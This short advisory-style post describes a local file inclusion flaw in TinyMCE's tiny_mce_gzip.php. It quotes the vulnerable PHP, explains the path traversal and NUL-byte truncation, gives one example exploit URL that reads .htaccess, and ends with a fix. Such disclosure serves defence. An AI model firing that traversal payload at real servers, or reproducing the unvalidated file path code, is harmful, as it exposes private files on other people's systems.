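If magic_quotes_gpc is Off in php.ini, then a local file inclusion in /jscripts/tiny_mce/tiny_mce_gzip.php is available to use ;)!!

Why? The script takes theme, language and plugins straight from $_REQUEST and concatenates them into the paths it hands to file_get_contents(), with no validation. realpath() only canonicalises the path; it does not confine it to the tiny_mce directory, so "../" sequences walk out of it. With magic_quotes_gpc Off the %00 byte is not escaped, so on PHP versions that do not reject NUL bytes in file paths it cuts off the appended ".js" suffix and the contents of any file readable by the web server are echoed back.

#code(jscripts/tiny_mce/tiny_mce_gzip.php)
...
$theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";
$language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";
$plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";
...
if ($theme) {
    // Write main script and patch some things
    echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));
    echo 'TinyMCE.prototype.loadScript = function() {};';
    echo "tinyMCE.init(TinyMCECompressed_settings);";

    // Load theme, language pack and theme language packs
    echo file_get_contents(realpath("themes/" . $theme . "/editor_template" . $suffix . ".js"));
    echo file_get_contents(realpath("themes/" . $theme . "/langs/" . $language . ".js"));
    echo file_get_contents(realpath("langs/" . $language . ".js"));

#exploit for example!:
http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced
...

Fix: validate theme, language and plugins against an allowlist (for example letters, digits, "_" and "-" only) before any path is built, and check that the resolved path still lies inside the tiny_mce directory before reading it.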